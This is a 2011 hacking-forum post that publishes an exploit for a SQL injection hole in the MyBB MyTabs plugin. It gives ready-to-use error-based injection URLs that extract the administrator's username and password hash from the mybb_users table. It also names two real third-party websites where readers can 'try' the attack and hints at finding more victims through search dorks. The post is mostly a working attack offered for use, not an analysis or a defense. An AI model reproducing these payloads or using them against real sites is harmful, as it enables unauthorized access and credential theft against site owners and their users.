.:: Blackc0de Forum ::.
Would you like to react to this message? Create an account in a few clicks or log in to continue.

-=Explore The World From Our Binary=-
 
HomeIndeksLatest imagesPendaftaranLogin

 

 MyBB 0day \ MyTabs (plugin) SQL injection vulnerability

Go down 
PengirimMessage
zer03s
Administrator
Administrator
zer03s


Jumlah posting : 2471
Points : 4119
Reputation : 113
Join date : 13.12.10
Age : 32
Lokasi : /home/root/blackc0de

MyBB 0day \ MyTabs (plugin) SQL injection vulnerability  Empty
PostSubyek: MyBB 0day MyTabs (plugin) SQL injection vulnerability    MyBB 0day \ MyTabs (plugin) SQL injection vulnerability  Icon_minitimeSun Dec 04, 2011 11:45 am

# Home : skidforums.AL , Autorun-Albania.COM , HackingWith.US , whiteh4t.com
# Date : 01 \ 08 \ 2011
# Tested on : Windows XP , Linux
# Category : web apps
# Software Link : http://mods.mybb.com/view/mytabs
# Google dork : Use your mind kid ^_^ !

Vulnerability :

$~ http://localhost/mybbpath/index.php?tab=[SQLi]

---------------------------------------
# ~ Expl0itation ~ #
---------------------------------------

$~ Get the administrator's username (usually it has uid=1) ~

http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -

$~ Get the administrator's password ~

http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -



You can try on this site

http://secworm.net/forums/index.php?tab=1'
http://icanhazcookie.net/index.php?tab=1'
Kembali Ke Atas Go down
http://zer03s.blog.com/
 
MyBB 0day \ MyTabs (plugin) SQL injection vulnerability
Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability
»  Threaded Mode | Linear Mode WordPress SendIt plugin 1.5.9 Blind SQL Injection Vulnerability
» Wordpress Plugin EasyComment Upload Vulnerability
» XLAgenda : SQL injection vulnerability
» Miibeian - SQL Injection Vulnerability

Permissions in this forum:Anda tidak dapat menjawab topik
.:: Blackc0de Forum ::. :: Information Technology :: Exploits-
Navigasi: